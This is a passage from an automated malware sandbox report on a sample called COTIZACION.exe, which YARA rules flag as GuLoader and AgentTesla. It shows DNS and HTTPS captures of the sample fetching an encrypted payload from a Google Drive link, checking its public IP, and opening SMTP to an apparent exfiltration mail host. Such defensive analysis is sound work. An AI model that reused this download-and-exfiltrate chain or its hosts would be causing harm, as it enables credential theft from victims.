Nov 5, 2024 12:38:42.531953096 CET	587	64766	67.23.226.139	192.168.2.9
Nov 5, 2024 12:38:42.579448938 CET	64766	587	192.168.2.9	67.23.226.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 12:37:31.648945093 CET	53	59195	1.1.1.1	192.168.2.9
Nov 5, 2024 12:38:29.886789083 CET	60555	53	192.168.2.9	1.1.1.1
Nov 5, 2024 12:38:29.894202948 CET	53	60555	1.1.1.1	192.168.2.9
Nov 5, 2024 12:38:31.337650061 CET	55933	53	192.168.2.9	1.1.1.1
Nov 5, 2024 12:38:31.345407009 CET	53	55933	1.1.1.1	192.168.2.9
Nov 5, 2024 12:38:37.711281061 CET	61672	53	192.168.2.9	1.1.1.1
Nov 5, 2024 12:38:37.720190048 CET	53	61672	1.1.1.1	192.168.2.9
Nov 5, 2024 12:38:39.740972042 CET	49476	53	192.168.2.9	1.1.1.1
Nov 5, 2024 12:38:40.106692076 CET	53	49476	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 12:38:29.886789083 CET	192.168.2.9	1.1.1.1	0x19f5	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:31.337650061 CET	192.168.2.9	1.1.1.1	0xc99e	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:37.711281061 CET	192.168.2.9	1.1.1.1	0xad51	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:39.740972042 CET	192.168.2.9	1.1.1.1	0x6a83	Standard query (0)	mail.showpiece.trillennium.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 5, 2024 12:37:08.622479916 CET	1.1.1.1	192.168.2.9	0x13e0	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 12:37:08.622479916 CET	1.1.1.1	192.168.2.9	0x13e0	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:29.894202948 CET	1.1.1.1	192.168.2.9	0x19f5	No error (0)	drive.google.com		142.250.185.238	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:31.345407009 CET	1.1.1.1	192.168.2.9	0xc99e	No error (0)	drive.usercontent.google.com		142.250.185.161	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:37.720190048 CET	1.1.1.1	192.168.2.9	0xad51	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:37.720190048 CET	1.1.1.1	192.168.2.9	0xad51	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:37.720190048 CET	1.1.1.1	192.168.2.9	0xad51	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 5, 2024 12:38:40.106692076 CET	1.1.1.1	192.168.2.9	0x6a83	No error (0)	mail.showpiece.trillennium.biz	showpiece.trillennium.biz		CNAME (Canonical name)	IN (0x0001)	false
Nov 5, 2024 12:38:40.106692076 CET	1.1.1.1	192.168.2.9	0x6a83	No error (0)	showpiece.trillennium.biz		67.23.226.139	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	64763	142.250.185.238	443	7796	C:\Users\user\Desktop\COTIZACION.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 11:38:30 UTC	216	OUT	GET /uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-05 11:38:31 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 05 Nov 2024 11:38:31 GMT Location: https://drive.usercontent.google.com/download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-Uu8iSgZZNLLraOoMG9G_Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	64764	142.250.185.161	443	7796	C:\Users\user\Desktop\COTIZACION.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 11:38:32 UTC	258	OUT	GET /download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-05 11:38:34 UTC	4930	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="xNXCSCUaWtBZCXPxCdsqI231.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 240192 Last-Modified: Thu, 31 Oct 2024 13:26:33 GMT X-GUploader-UploadID: AHmUCY3_TwSlRL-hFr8jdCz5qXM5Lb0gVmncG9J3FxanAolo4i6sf2Imfk-tK_Wm0G9vRaA7qkJ90Yy0Jg Date: Tue, 05 Nov 2024 11:38:34 GMT Expires: Tue, 05 Nov 2024 11:38:34 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=5iM8ZA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-05 11:38:34 UTC	4930	IN	Data Raw: 93 a9 37 5e 77 bc d1 80 c7 53 16 32 70 df 2d 10 7a 44 6c 5b 27 c8 c9 85 d2 1b ed 33 03 25 8f 88 3e 4e 58 72 e9 7f 75 d6 a3 2a 79 ae 79 96 04 d0 56 35 16 ba f5 22 82 2c 8e 68 0f 12 f1 b0 b2 8c 01 72 a4 82 0f d4 ab 18 46 0b 6e c0 52 34 9f d5 fc 3e d8 98 a1 b7 78 2a 56 3c c0 5d af 5a 1a ba 16 d9 18 fb 76 21 85 cf 7b 05 f5 47 ee ec 0c 7e aa a2 b6 51 11 3b 92 cd 05 e4 92 59 32 36 5d de 82 71 66 c1 70 cd 9f 6c 9e e1 e2 04 8a 62 1b c1 8e 10 cc e1 e5 a3 16 9b 3c ea 72 71 62 0c 16 84 ba 12 2f a5 db 88 ed 61 9f 39 f6 2c d7 75 ce b9 aa 39 a7 a5 5d 14 6e 4d 23 f4 87 1a 45 cb cb ab 2c 34 64 21 f2 86 d1 0a 88 ba 35 a4 97 9e 38 62 85 35 7a ea ca 40 62 4d 02 aa 75 ab 39 22 d4 22 4c da 8c 8a 12 eb 35 15 03 b2 1d 09 0a 21 b4 c8 94 e3 ad 74 f3 f4 21 0e 24 d2 88 22 33 8a 22 Data Ascii: 7^wS2p-zDl['3%>NXruyyV5",hrFnR4>xV<]Zv!{G~Q;Y26]qfplb<rqb/a9,u9]nM#E,4d!58b5z@bMu9""L5!t!$"3"
2024-11-05 11:38:34 UTC	4837	IN	Data Raw: fa 03 bc c7 ff 30 05 35 96 9b c7 bb 60 b8 36 eb 8a e8 e3 45 35 7a 47 66 89 a8 3f dc 01 37 4f 7b 4f 55 9c 5e e5 2c 25 e1 87 65 84 f6 93 11 f3 fe 1a 39 62 67 db 39 13 ec 9a d5 91 1b 33 aa c0 b9 c0 f0 fc 3c 36 36 46 8a aa 1e 43 f3 43 9d 37 f3 95 5f bc 42 c9 62 85 e9 a9 e8 fc 21 18 6f d2 4e 22 00 a1 81 9d 04 8c d7 63 35 19 ff a3 8a 95 12 40 17 62 82 54 c1 13 a8 dc 9f 15 c8 a6 0b 8c b0 4b 62 df 61 ec 3d d1 c5 91 96 96 03 87 ff b4 44 c9 17 66 eb 78 13 09 1d fe 60 c5 de 1f 1b c2 f9 52 81 42 e9 52 c3 ea 29 6d c4 5c cc 8b d7 6c 6c ec 97 59 30 b4 c8 00 01 93 1e 53 5e 89 e8 e5 82 78 09 05 8d 2d c4 84 4d f0 67 7d 07 52 47 e1 9c 6a f4 b3 20 e5 e4 c9 7e c2 5a 5f ff 8c 29 05 52 c5 bb cb fd 81 90 78 ca 28 fd 04 8b 5e 26 59 26 b5 a6 15 85 a5 06 50 9d 6c 01 d5 dc ec a0 e4 Data Ascii: 05`6E5zGf?7O{OU^,%e9bg93<66FCC7_Bb!oN"c5@bTKba=Dfx`RBR)m\llY0S^x-Mg}RGj ~Z_)Rx(^&Y&Pl
2024-11-05 11:38:34 UTC	1324	IN	Data Raw: 1a 43 2f bf 4a e6 6d 13 42 1a 17 17 58 63 7c b9 d6 a9 27 da ef 5d ae fa 9c f9 4b 77 69 72 78 58 f9 f1 47 75 b5 6f 4e 7a 31 03 35 8a 06 57 d5 04 7d be 2c b1 e1 8b c6 e5 ec 8b 8d 14 69 52 25 0b d7 8e 79 88 f5 61 53 1a 77 af ae f4 02 3a fe 2b 7a 7d fa d2 d2 c6 d7 31 da b6 4b d1 1a 61 45 bc 0f dc 54 5d d4 24 82 ef a1 33 55 d6 c1 94 5a f5 a9 67 0e f0 92 aa 10 a7 90 20 dd 3d 9f 56 a7 7c 0e 4e a3 4d be 6e c8 b2 c0 69 96 3d 7b 5b 9c 41 dc 1b f6 6d a5 7f a7 3e 0f 78 f7 58 49 74 63 6c 9a dd 1f 61 3e 87 2e 31 1c 53 8b ac b6 a5 13 20 12 60 07 05 5b fb ef 5a c3 e2 a1 84 27 47 49 e6 6f 82 6f 80 73 f5 9c 85 73 8f 61 71 3e e6 ba a0 26 2f 78 a6 f0 8c fe c9 e5 78 94 e5 e1 94 6d d7 ab e5 17 08 35 49 af 85 76 16 34 57 64 90 99 64 72 79 40 72 e1 83 1d 3d cc a3 2a ec 38 58 c9 Data Ascii: C/JmBXc\|']KwirxXGuoNz15W},iR%yaSw:+z}1KaET]$3UZg =V\|NMni={[Am>xXItcla>.1S `[Z'GIoossaq>&/xxm5Iv4Wddry@r=*8X
2024-11-05 11:38:34 UTC	1378	IN	Data Raw: 8c 09 1f cb 5d 19 1d 7c d0 c4 cb 00 ac a6 68 96 6e 2e 0b dc c4 37 35 f6 eb f4 1e bd 23 cb 89 bf 05 b4 90 74 36 69 00 c2 05 02 e5 46 aa 3d 62 da 27 d3 40 b6 ea 84 f6 f1 26 d1 19 5b f7 fb b4 5e 72 0e 22 b9 e2 db cd 72 0e 28 11 70 eb 83 8b b0 b6 f0 b0 f7 2b 67 61 f5 c4 c3 60 fc 61 b3 4a d3 ef 24 4a bd 75 50 c4 16 7b d9 bf b9 15 47 33 5b 1a 04 27 a5 62 5c b6 d6 a9 2f e2 2c 4e 8e fa bc e3 4b 89 67 8f 76 6c fc f0 b9 79 b9 91 62 6b 31 23 30 74 07 6e 30 05 44 a8 d2 bd e5 75 e2 db ec 75 8b 99 2d 12 3f 0a 29 80 59 8e d5 72 53 e4 79 52 a0 f8 fc 36 03 27 56 7f da d6 d2 38 d6 f6 ca 8f 69 d1 e4 6d bb b6 f1 d2 7d 62 f4 27 88 cf b1 cd 5b d5 ab cc 8c b9 aa 67 24 0a 9c ae 10 79 94 19 fe 3d 61 58 55 75 0e b0 d3 22 be 4e d8 4c cc 6b 68 c2 4e 41 9c 69 de e5 fa 42 5b 59 99 3e Data Ascii: ]\|hn.75#t6iF=b'@&[^r"r(p+ga`aJ$JuP{G3['b\/,NKgvlybk1#0tn0Duu-?)YrSyR6'V8im}b'[g$y=aXUu"NLkhNAiB[Y>
2024-11-05 11:38:34 UTC	1378	IN	Data Raw: d2 5b 17 42 e7 f0 53 59 95 cd f4 e2 c4 23 60 25 3f 43 90 a4 7f 99 08 c9 c8 cd 06 1b 2d 63 86 68 c3 57 87 62 63 72 7c 8d 1e 6e da 8c 66 7c 50 d2 1f 8c 09 1d 15 56 1b 1d 5c 2a ca c8 00 52 56 67 95 6e f0 0f df c4 17 ce f7 d2 fa e0 bc 1a e5 f9 bf 05 4a bc 7d 36 97 0c 3d 0b 41 44 b9 ab ce 41 dc 07 d8 40 48 e4 79 f7 c8 f8 dd 1a 5b 29 f2 b4 5e 09 94 23 80 ec 25 c0 73 0e 73 77 70 eb 87 1a 85 b5 f0 b6 29 2b 64 61 d5 3c cd 63 fc 9f 4c 7f d5 ef 04 4a 85 70 50 3a 17 7a 25 41 46 ea 6d 13 5a 1a 17 17 58 6c 46 b7 d6 57 2b e1 2c 7f a2 fa bc e3 b5 76 50 89 76 54 f9 c9 bc 79 b9 6f 56 b6 cc fc ca 0a 4b 6e ce 0e 83 b7 d3 bd 1b 82 ec db 12 82 84 98 05 61 25 0a 2f aa 79 93 e5 77 53 0a 76 51 a0 f3 02 3a 11 07 76 7d da d6 2c c8 d4 cf e3 fc 69 d1 1a 61 45 ba 0c dc 5c 60 d4 24 88 Data Ascii: [BSY#`%?C-chWbcr\|nf\|PV\*RVgnJ}6=ADA@Hy[)^#%sswp)+da<cLJpP:z%AFmZXlFW+,vPvTyoVKna%/ywSvQ:v},iaE\`$
2024-11-05 11:38:34 UTC	1378	IN	Data Raw: 68 57 a3 11 94 00 7e 85 84 f3 bc 05 f5 3f e6 f5 ae 6c 86 f9 2c 85 4b 15 85 d9 34 01 41 e3 5b ec e1 79 96 94 65 55 5f 71 c6 74 2f da e5 9d 0c d7 e1 7e a5 d1 aa cd f0 53 a7 87 fc f6 c2 24 23 60 25 0c ed 90 b5 5f b9 0a c9 c8 33 f6 17 2e 5b 07 96 cf 54 87 bc 6b 70 7c ad e1 6f e3 82 98 7d 69 f6 90 8c 09 e3 3c 53 1b 66 28 d4 c4 cf 28 0e a8 6b 9c 54 7d 07 df c4 37 32 f6 eb f4 1e b2 18 dd 89 41 09 48 9c 54 34 97 0c c3 fb 43 7d ab 55 c2 42 fc 27 d3 40 48 1a 89 f6 f1 f8 de 1a 5b d7 05 ba 5c 72 f0 dd 8c ea db ed 72 0e 08 10 8e ea ba 7f be b5 f0 b0 29 26 64 61 d5 3c cd 62 fc 9f 4c 7f d4 ef 04 49 85 70 50 3a 17 7a 2a 41 46 ea 55 36 5b 1a 17 2f dc 9d ba 48 28 a0 27 e2 57 2a ae fa b8 c6 b5 79 68 8c 88 59 f9 f1 91 24 b9 6f 64 96 38 03 35 0f 73 6e ce 00 55 b8 d2 bd e3 75 Data Ascii: hW~?l,K4A[yeU_qt/~S$#`%_3.[Tkp\|o}i<Sf((kT}72AHT4C}UB'@H[\rr)&da<bLIpP:zAFU6[/H('WyhY$od85snUu
2024-11-05 11:38:34 UTC	1378	IN	Data Raw: a5 83 a6 a2 9e fc fb 97 4e 52 1c e9 69 25 52 d8 95 be 50 32 07 4c 07 65 1f e3 f6 89 6f 80 62 6f d2 8d cd c0 c0 ca 3a 11 a9 b2 cb 5f 00 44 20 95 8b 9a 5b a3 31 b6 00 7e 85 7a 0c 84 2e ff 3f e6 0b a7 4c 87 d1 61 85 b5 1d a5 da 34 ff 4d 1d 55 cc e5 79 68 98 9b 54 46 7d c6 74 2f 1c e1 a4 2f d7 d9 2c a4 27 55 e7 d8 16 a7 9c ca 0a cb c5 23 40 56 00 ed 90 5a 7e e6 33 c4 ca cd f8 35 24 63 86 96 31 5a 87 42 67 8c 70 8d e0 4f f4 82 66 7c ae eb a9 86 09 1d 35 79 3b 05 5c d4 c4 35 0e 52 a8 6b 68 62 d0 07 ff 8e 17 30 f6 15 f5 d9 b6 1a dd 89 95 25 01 9c 74 36 69 02 c3 05 42 ba b5 55 c2 62 bd 27 d3 40 b6 e5 be d4 f1 d8 dd e4 52 d7 fb 91 25 06 f0 23 84 9a 57 c9 72 7e 20 0b 70 eb 89 08 ca b5 f0 b4 29 45 64 61 d5 3c cd 60 fc 9f 4c 7f d6 ef 04 78 85 70 50 3a 17 7a 25 41 46 Data Ascii: NRi%RP2Leobo:_D [1~z.?La4MUyhTF}t//,'U#@VZ~35$c1ZBgpOf\|5y;\5Rkhb0%t6iBUb'@R%#Wr~ p)Eda<`LxpP:z%AF
2024-11-05 11:38:34 UTC	1378	IN	Data Raw: 45 0e 0d e4 8e f6 e5 31 f8 3e fe 68 6d ff d1 2a de 06 a9 86 cb 23 52 c7 c2 7b df 37 1e c4 35 7c 1f a6 de 9e 2d 4d 5c 6d cb 45 f8 0d ec 2a 21 8d 40 d8 d7 e6 a2 9a dc 11 96 77 70 e2 e7 69 db 5b 26 99 9b 2b 66 3b 4c 03 17 63 e6 cf ee 47 9b 62 91 d1 f1 b9 e0 b0 ce 1a 50 e9 d9 36 5e f1 64 1d 95 75 96 a5 ad 11 b4 00 80 89 84 0d 9d 34 ff 3f e6 0b af 75 8d f9 2c 85 9f 3b 8c d9 34 ff b3 ed 5b cc e5 87 9a 94 9b 74 5f 74 c6 74 d1 e3 d9 8a 0c d7 d9 d2 53 2f 55 c7 fd 53 a7 9c 8c 5b 3d 3b dc 40 1f 00 ed 90 5a 71 b9 0a c9 36 c1 f8 15 0e 46 86 96 cf aa 86 7b 45 72 7c 8d 1e 66 e3 82 43 07 24 ea 90 88 7b c3 31 53 6b 35 47 d4 c4 c1 7d 26 a8 6b 92 4e f6 07 df c4 e9 3e f6 eb f4 1e b0 1a dd a9 94 05 4a 9c 8a 37 ae 2e c3 05 42 ba b0 55 c2 67 a7 53 d3 40 4c 96 6d f2 f1 a8 f5 01 Data Ascii: E1>hm#R{75\|-M\mE!@wpi[&+f;LcGbP6^du4?u,;4[t_ttS/US[=;@Zq6F{Er\|fC${1Sk5G}&kN>J7.BUgS@Lm
2024-11-05 11:38:34 UTC	1378	IN	Data Raw: 18 8c bc 5d ba cd d2 7a 3c 5c 20 8b fe 7a 01 72 8d c6 fb fc 7f 9a 86 c6 2a 03 f6 82 5e 06 3d 3e b5 a6 e1 f9 ae 0d 50 99 92 27 f7 d0 83 b9 e4 a7 6f 45 0e 27 3a bb f6 e5 11 54 30 fe 68 93 00 e4 08 de 26 ba 78 c2 23 ac e3 80 2d df 37 1a 48 b6 79 1f f3 8d f1 2d 4d 52 62 6d 41 f8 79 e4 62 21 8d 4a 5b ad e6 a2 9e 02 09 96 77 50 16 e9 69 db a5 d9 ac b9 2b 46 07 b2 0a 17 9d c2 8d 8d 47 9b 66 1d 4c f5 b9 b0 e8 d5 1a 50 a3 cf bf a1 0e 40 00 9e 75 96 5b 5d 1f b4 00 7e 7b 88 0d bd 1c f2 3f e6 f5 50 4d be db 2c 85 b5 e5 8c d9 34 da 36 97 5b cc e1 0b 30 91 9b 24 4e 6f c6 74 25 9f 94 9d 0c d3 f9 22 5a 2e 55 19 fe 53 a7 9c 32 f8 c2 c4 03 63 25 00 ed 6e a5 46 ae 0a c9 c8 33 f1 14 2e 43 8e 96 cf 54 c7 8e 90 8d 83 ad e4 6f e3 82 98 72 50 ea 90 72 05 1d 35 73 53 1d 5c d4 3a Data Ascii: ]z<\ zr*^=>P'oE':T0h&x#-7Hy-MRbmAyb!J[wPi+FGfLP@u[]~{?PM,46[0$Not%"Z.US2c%nF3.CTorPr5sS\:
2024-11-05 11:38:34 UTC	1378	IN	Data Raw: 84 63 7e 4b ed ac ea 93 5d 45 cc 58 be a9 a3 77 1c c4 fc 71 25 be b5 7e ff 9d 19 73 c6 84 eb e5 0e 69 09 05 fd fb de 84 4d da 78 3a 07 52 c9 c8 b2 60 f4 b9 5d e0 c5 a7 7a 3c 56 a3 f1 fe 7a 05 ac b9 c6 fb dc d0 94 86 c6 d4 fc c3 95 5e 26 36 c0 bc a7 1f d8 e0 07 50 99 d2 d3 26 23 7c 99 b6 59 61 45 f0 29 c4 b7 f6 1b 3d 06 30 de 5c 6d 01 dd d4 df 1f 98 86 cb 23 52 cf fb 59 fa 4c 6a 3a 3c 78 6d b1 a3 ea 5d 65 43 1f 19 4b 85 09 c4 31 25 ad 7f a5 a3 e6 5c 90 fc 05 96 89 7c 1c e9 49 82 5b d8 95 65 2a 7f 0d 4c 03 17 b7 c7 ac f9 47 9b 9c 61 d8 f0 b9 3e cc ce 1a 70 8a b2 cb a1 f0 45 19 9f 75 96 5b 89 31 90 00 7e 85 7a 03 bd 3c ff c1 ea f5 ae 6c 9f f9 2c 85 4b 1a bc ce 34 ff 4d 1d 52 cd e5 59 b0 94 9b 54 26 43 31 8b d0 c2 f9 9d 0c d7 27 22 5a 2e 55 19 fc 53 a7 bc bd Data Ascii: c~K]EXwq%~siMx:R`]z<Vz^&6P&#\|YaE)=0\m#RYLj:<xm]eCK1%\\|I[e*LGa>pEu[1~z<l,K4MRYT&C1'"Z.US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	64765	104.26.12.205	443	7796	C:\Users\user\Desktop\COTIZACION.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 11:38:38 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-05 11:38:38 UTC	398	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 11:38:38 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8ddc8f062ad9d5db-DFW server-timing: cfL4;desc="?proto=TCP&rtt=2032&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=1421000&cwnd=57&unsent_bytes=0&cid=bf63edef0ba4c821&ts=190&x=0"
2024-11-05 11:38:38 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 Data Ascii: 173.254.250.76

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 5, 2024 12:38:40.754591942 CET	587	64766	67.23.226.139	192.168.2.9	220-super.nseasy.com ESMTP Exim 4.96.2 #2 Tue, 05 Nov 2024 06:38:40 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 5, 2024 12:38:40.754873037 CET	64766	587	192.168.2.9	67.23.226.139	EHLO 376483
Nov 5, 2024 12:38:40.906240940 CET	587	64766	67.23.226.139	192.168.2.9	250-super.nseasy.com Hello 376483 [173.254.250.76] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 5, 2024 12:38:40.906735897 CET	64766	587	192.168.2.9	67.23.226.139	STARTTLS
Nov 5, 2024 12:38:41.060506105 CET	587	64766	67.23.226.139	192.168.2.9	220 TLS go ahead

Target ID:	0
Start time:	06:37:09
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\COTIZACION.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COTIZACION.exe"
Imagebase:	0x400000
File size:	1'206'384 bytes
MD5 hash:	AD3B285C00819C0AA52BB492CE560BC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2000502828.0000000006398000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:38:16
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\COTIZACION.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COTIZACION.exe"
Imagebase:	0x400000
File size:	1'206'384 bytes
MD5 hash:	AD3B285C00819C0AA52BB492CE560BC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	30.7%
Dynamic/Decrypted Code Coverage:	25.9%
Signature Coverage:	16.5%
Total number of Nodes:	826
Total number of Limit Nodes:	18

Executed Functions

Function 004036DA Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F
GetVersionExW.KERNEL32(?), ref: 00403732
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
OleInitialize.OLE32(00000000), ref: 0040381B
SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
CharNextW.USER32(00000000,"C:\Users\user\Desktop\COTIZACION.exe",?,"C:\Users\user\Desktop\COTIZACION.exe",00000000), ref: 0040389B
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
DeleteFileW.KERNELBASE(1033), ref: 00403A05

Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\COTIZACION.exe,00000400), ref: 004033FA

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403AA8
